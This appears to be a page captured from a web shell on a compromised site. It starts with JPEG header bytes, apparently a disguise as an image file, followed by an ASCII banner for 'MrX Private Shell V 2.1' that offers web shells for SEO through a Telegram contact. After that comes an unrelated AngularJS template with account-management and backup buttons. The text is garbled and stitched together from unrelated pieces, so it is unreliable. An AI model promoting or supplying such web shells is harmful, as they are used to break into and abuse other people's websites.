����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<div style="padding: 20px;">
<ul class="action-icons">
<li>
<a href="{{primaryURL}}/accountManage/{{account._id}}" ng-click="changeView('/accountManage/' + account._id)">
<em aria-hidden="true" class="fas fa-cog"></em>
{{ lang.t("Manage Account") }}
</a>
</li>
<li ng-show="!info.bod_disabled && account.max_snapshots !== 0">
<button ng-click="createSnapshot(account)">
<em aria-hidden="true" class="fas" ng-class="{ 'fa-archive': !loaders.snapshot, 'fa-spin fa-circle-notch': loaders.snapshot }"></em>
{{ lang.t("Create Backup On Demand") }}
</button>
</li>
<li ng-if="perm.canManageAccountBackups">
<button ng-click="viewBackups(account)">
<em aria-hidden="true" class="fas fa-cubes"></em>
{{ lang.t("View Backups") }}
</button>
</li>
<li ng-if="perm.canDownloadBackups">
<button ng-click="viewDownloads(account)">
<em aria-hidden="true" class="fas fa-cloud-download-alt"></em>
{{ lang.t("View Downloads") }}
</button>
</li>
</ul>
</div>